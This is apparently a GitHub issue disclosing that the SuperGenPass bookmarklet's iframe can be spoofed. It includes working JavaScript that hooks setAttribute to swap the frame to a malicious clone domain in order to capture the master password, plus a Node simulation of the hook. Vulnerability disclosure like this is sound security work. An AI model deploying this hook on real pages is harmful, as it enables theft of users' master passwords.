supergenpass
Master password entered via bookmarklet can be stolen by spoofing the iframe.
Here is code that detects the opening of SGP and replaces the URL of the created iframe. I could then create a copy of SGP and add a script for sending the master password to my server. The user wouldn't notice anything suspicious, as they don't see the real iframe's URL.
// Keep a reference to the real setAttribute so the hook can still do the normal work.
var originalSetAttribute = Element.prototype.setAttribute

// Hook setAttribute for every element. When the bookmarklet points the iframe
// at the real SGP URL, wait for that frame to finish loading, then swap its
// src to the attacker-controlled clone. The value check is deliberately
// independent of the attribute name; matching on the URL alone is enough here.
Element.prototype.setAttribute = function (name, value) {
    if (value == "https://chriszarate.github.io/supergenpass/mobile/") {
        this.onload = () => {
            // The clone is served from a domain the attacker controls.
            this.setAttribute("src", "https://www.malicious-clone-of-sgp.com/supergenpass/mobile/")
            // Detach so the clone's own load does not trigger the swap again.
            this.onload = null
        }
    }
    // Let the original call through so the page behaves normally otherwise.
    originalSetAttribute.call(this, name, value)
}
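A DOM-free simulation of the hook described in this issue, runnable under Node. This is an added example and not code from the original report or from the SuperGenPass project: the `Element` class is a stand-in for the browser's Element, `runBookmarklet` stands in for the real bookmarklet, `navigateUntilSettled` imitates the browser re-navigating an iframe whenever its `src` changes, and the clone URL is the hypothetical one from the issue.

```javascript
// Added example, not from the original issue or the SuperGenPass project.
const SGP_URL = "https://chriszarate.github.io/supergenpass/mobile/";
// Hypothetical attacker-controlled clone (the URL used in the issue).
const EVIL_URL = "https://www.malicious-clone-of-sgp.com/supergenpass/mobile/";

// Minimal stand-in for a browser Element: an attribute map plus a load()
// that fires onload the way a real iframe does once its document has loaded.
class Element {
  constructor(tag) {
    this.tagName = tag;
    this.attrs = new Map();
    this.onload = null;
    this.loads = []; // every URL that was actually loaded into this frame
  }
  setAttribute(name, value) { this.attrs.set(name, value); }
  getAttribute(name) { return this.attrs.get(name); }
  load() {
    this.loads.push(this.getAttribute("src"));
    if (typeof this.onload === "function") this.onload();
  }
}

// The same hook the issue shows, installed on the stand-in prototype.
// Returns the unpatched function so callers can restore it.
function installHook() {
  const originalSetAttribute = Element.prototype.setAttribute;
  Element.prototype.setAttribute = function (name, value) {
    if (value == SGP_URL) {
      this.onload = () => {
        this.setAttribute("src", EVIL_URL); // swap only after the real page loaded
        this.onload = null;                 // do not swap again on the clone's load
      };
    }
    originalSetAttribute.call(this, name, value);
  };
  return originalSetAttribute;
}

// Stand-in for the bookmarklet: create the iframe and point it at SGP.
function runBookmarklet() {
  const frame = new Element("iframe");
  frame.setAttribute("src", SGP_URL);
  return frame;
}

// A browser navigates an iframe again whenever its src changes; emulate
// that by loading until the src is stable (bounded to avoid runaway loops).
function navigateUntilSettled(frame, maxLoads = 5) {
  for (let i = 0; i < maxLoads; i++) {
    const before = frame.getAttribute("src");
    frame.load();
    if (frame.getAttribute("src") === before) break;
  }
}

// Run the bookmarklet on a page with or without the hostile hook and report
// what a quick look at the freshly created frame shows versus what was
// actually loaded into it.
function simulate(hooked) {
  const pristine = Element.prototype.setAttribute;
  if (hooked) installHook();
  try {
    const frame = runBookmarklet();
    const shownSrc = frame.getAttribute("src"); // looks legitimate right after creation
    navigateUntilSettled(frame);
    return {
      shownSrc,
      finalSrc: frame.getAttribute("src"),
      loads: frame.loads.slice(),
    };
  } finally {
    Element.prototype.setAttribute = pristine; // undo the hook for the next run
  }
}

console.log("clean page :", JSON.stringify(simulate(false)));
console.log("hostile page:", JSON.stringify(simulate(true)));
```

The point the simulation makes concrete is that the `src` the bookmarklet sets is the genuine one, so inspecting the frame at creation time (or even letting the real SGP page load first) reveals nothing; the swap happens on `onload`, after which the frame shows a clone on a different origin. Because the hook lives in the page that the bookmarklet runs on, any check performed from that page's JavaScript is under the attacker's control as well.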
Yet another reason to download these sorts of browser-based tools and run them locally in their own separate window, as it is not that hard to copy and paste from one window to another.
Already mentioned in https://github.com/chriszarate/supergenpass/issues/75#issuecomment-464920709